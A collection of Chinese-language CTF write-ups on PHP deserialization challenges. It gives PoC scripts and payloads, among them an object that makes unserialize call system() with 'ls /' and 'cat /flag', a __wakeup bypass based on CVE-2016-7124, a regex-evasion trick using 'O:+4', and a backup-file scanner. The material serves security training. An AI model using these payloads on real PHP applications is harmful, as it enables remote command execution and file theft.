[SWPUCTF 2021 新生赛]ez_unserialize
查看源代码想到robots协议
看这个代码比较简单
直接让admin=admin passwd=ctf就行了
poc
<?php
// PoC for [SWPUCTF 2021 新生赛] ez_unserialize.
// The target only checks admin === "admin" and passwd === "ctf" (see the
// writeup above), so a plain wllm object carrying those two public
// properties is the whole payload; we just print its serialized form.
class wllm
{
    public $admin;
    public $passwd;
}

$p = new wllm();
foreach (['admin' => 'admin', 'passwd' => 'ctf'] as $prop => $val) {
    $p->$prop = $val;
}
print serialize($p);
payload:
?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}
[SWPUCTF 2022 新生赛]1z_unserialize
关键是搞懂 $a($this->lly); 这一句:这是 PHP 的"变量函数"调用,$a 里存的是函数名。
关键语句
$a() 表示调用一个函数,函数名由变量 $a 的值确定。换句话说,$a 应该是一个存储函数名的变量。当你写 $a() 时,PHP 将尝试调用这个名字对应的函数,并传入括号里的参数。
//例如,如果你有一个函数名存储在变量 $a 中,比如 $a = "myFunction";,然后你写 $a(),PHP 将尝试调用 myFunction() 这个函数。
而$a()括号里面的值应该是向函数传递的参数
这样我们让$a的值为命令执行函数 我们就可以成功的命令执行了
poc
// PoC for [SWPUCTF 2022 新生赛] 1z_unserialize.
// The target ends up calling $a($this->lly) with $a taken from one of the
// object's properties (a variable-function call), so an lyh object whose
// callable property names a command-execution function and whose $lly holds
// the command turns unserialize() into RCE.
// NOTE(review): which property feeds $a is inferred from the writeup's payload
// ($lt = 'system'); confirm against the challenge source.
class lyh
{
    public $url = 'NSSCTF.com';
    public $lt = 'system';  // function name that becomes $a
    public $lly = 'ls /';   // argument handed to $a(); swap in "cat /flag" once the path is known
}

$a = new lyh;
print serialize($a);
payload
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:4:"ls /";}
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}
wakeup()绕过
当反序列化字符串中表示属性个数的值大于真实属性个数时,unserialize() 会跳过 __wakeup() 的执行(CVE-2016-7124)。注意这只是旧版本 PHP 的 bug:在已修复的版本上,这种个数不匹配的畸形字符串通常会直接导致反序列化失败而不是绕过。
漏洞影响范围
PHP5 < 5.6.25
PHP7 < 7.0.10
标准序列化结果
O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
将 2 改为 3,绕过 __wakeup 魔术方法(仅对上面列出的受影响版本有效)
O:4:"User":3:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
[SWPUCTF 2022 新生赛]ez_ez_unserialize
poc
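// PoC for [SWPUCTF 2022 新生赛] ez_ez_unserialize.
// Fix: the original default was 'fllllllag . php' (with spaces), so serialize()
// printed s:15:"fllllllag . php" while the payload that is actually submitted
// needs s:13:"fllllllag.php"; the property now holds the exact file name.
class X
{
    public $x = 'fllllllag.php';
}

$lcycb = new X();
$raw = serialize($lcycb);   // O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

// The submitted payload declares 2 properties although only one is present.
// On PHP < 5.6.25 / < 7.0.10 (CVE-2016-7124) that mismatch makes unserialize()
// skip __wakeup(); the count bump was done by hand in the writeup, now it is scripted.
$payload = str_replace('"X":1:', '"X":2:', $raw);

echo $raw, PHP_EOL, $payload, PHP_EOL;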
payload:
x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}
Web_php_unserialize攻防世界
这里就是要绕过这个正则
if (preg_match('/[oc]:\d+:/i', $var)) { die('stop hacking!'); } else {@unserialize($var); }
这个正则(i 表示不区分大小写)匹配的是 o 或 c 后面紧跟"冒号、一串数字、冒号"的形式,也就是序列化对象 O:4: 这样的前缀,匹配到就直接 die,所以正常的序列化字符串都会被拦下。
绕过方式:在数字前加正号,如 O:+4:。\d+ 要求冒号后面紧跟数字,多出来的 + 让正则匹配不上;而 unserialize() 解析长度时允许前导 +,数值不变,仍然可以正常反序列化。
poc
class Demo{private $file = 'fl4g.php';public function __sleep(){return ['file'];}}$lcycb = new Demo();$lcycb = serialize($lcycb);echo $lcycb;$lcycb = str_replace('O:4', 'O:+4', $lcycb);$lcycb = str_replace('"Demo":1:', '"Demo":2:', $lcycb);echo $lcycb;echo base64_encode($lcycb);?>
payload
?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
unserialize3攻防世界
poc
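// PoC for XCTF unserialize3.
// Fix: the original only printed the un-bumped string and the 1 -> 2 count edit
// seen in the payload was applied by hand; it is now produced by the script.
// The bump declares more properties than are present, which on
// PHP < 5.6.25 / < 7.0.10 (CVE-2016-7124) makes unserialize() skip __wakeup().
// NOTE(review): the need for the bypass is inferred from the writeup's payload;
// confirm the target really defines a __wakeup() that must be skipped.
class xctf
{
    public $flag = '111';
}

$lcycb = new xctf();
$raw = serialize($lcycb);   // O:4:"xctf":1:{s:4:"flag";s:3:"111";}
$payload = str_replace('"xctf":1:', '"xctf":2:', $raw);

echo $raw, PHP_EOL, $payload, PHP_EOL;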
payload
?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}
[极客大挑战 2019]PHP BUUCTF
用脚本扫一下备份
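import requests

# Base URL of the instance to scan.
# Fix: the original appended '/' + name to a URL that already ended in '/',
# producing "...:81//www.zip" despite its own comment saying not to add a
# trailing slash; the slash is now stripped before joining.
url1 = 'http://dbd62227-e75f-44c3-8862-b369e671379e.node5.buuoj.cn:81/'
# Common base names of leaked source backups.
list1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
# Common archive extensions for those backups.
list2 = ['tar', 'tar.gz', 'zip', 'rar']

base = url1.rstrip('/')
for i in list1:
    for j in list2:
        back = i + '.' + j
        url = base + '/' + back
        print(back + ' ', end='')
        # A timeout keeps the loop from hanging on a dead instance; only the
        # status code is printed, a 200 means the archive is downloadable.
        print(requests.get(url, timeout=10).status_code)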
找到
// Challenge source obtained from the backup scan above (reformatted, comments
// added by reviewer; the code itself is unchanged).
include 'flag.php';
error_reporting(0);

class Name
{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username, $password)
    {
        $this->username = $username;
        $this->password = $password;
    }

    // Runs right after unserialize() and clobbers username, so the === 'admin'
    // check in __destruct() can only pass if this hook is skipped (the
    // property-count mismatch bypass, CVE-2016-7124, on affected PHP versions).
    function __wakeup()
    {
        $this->username = 'guest';
    }

    // Runs when the object is destroyed, i.e. at the end of the request.
    function __destruct()
    {
        // Loose comparison: the string "100" (s:3:"100") passes as well as int 100.
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;
            echo "</br>";
            echo "You password is: ";
            echo $this->password;
            echo "</br>";
            die();
        }
        // Strict comparison: username must be exactly the string 'admin'.
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        } else {
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
poc
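// PoC for [极客大挑战 2019] PHP: a Name whose private username/password serialize
// to "admin" / "100".
// Fixes vs. the original PoC:
//  - dropped the pasted-in `include 'flag.php'; error_reporting(0);` -- they belong
//    to the challenge source, not to a payload generator, and only served to hide
//    the warning for the missing file;
//  - the 2 -> 3 property-count bump and the %00 encoding, previously done by hand,
//    are now produced by the script so the printed payload is what gets submitted.
// Private properties serialize with a NUL-delimited class prefix ("\0Name\0username",
// length 14), and NUL cannot travel in a query string, hence %00. The count
// mismatch makes unserialize() skip __wakeup() -- which would reset username to
// 'guest' -- on PHP < 5.6.25 / < 7.0.10 (CVE-2016-7124). password stays the
// string "100": the target compares it with `!= 100`, a loose check it satisfies.
class Name
{
    private $username = 'admin';
    private $password = '100';
}

$lcycb = new Name();
$raw = serialize($lcycb);
$payload = str_replace("\0", '%00', str_replace('"Name":2:', '"Name":3:', $raw));

echo $raw, PHP_EOL, $payload, PHP_EOL;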
payload:
?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}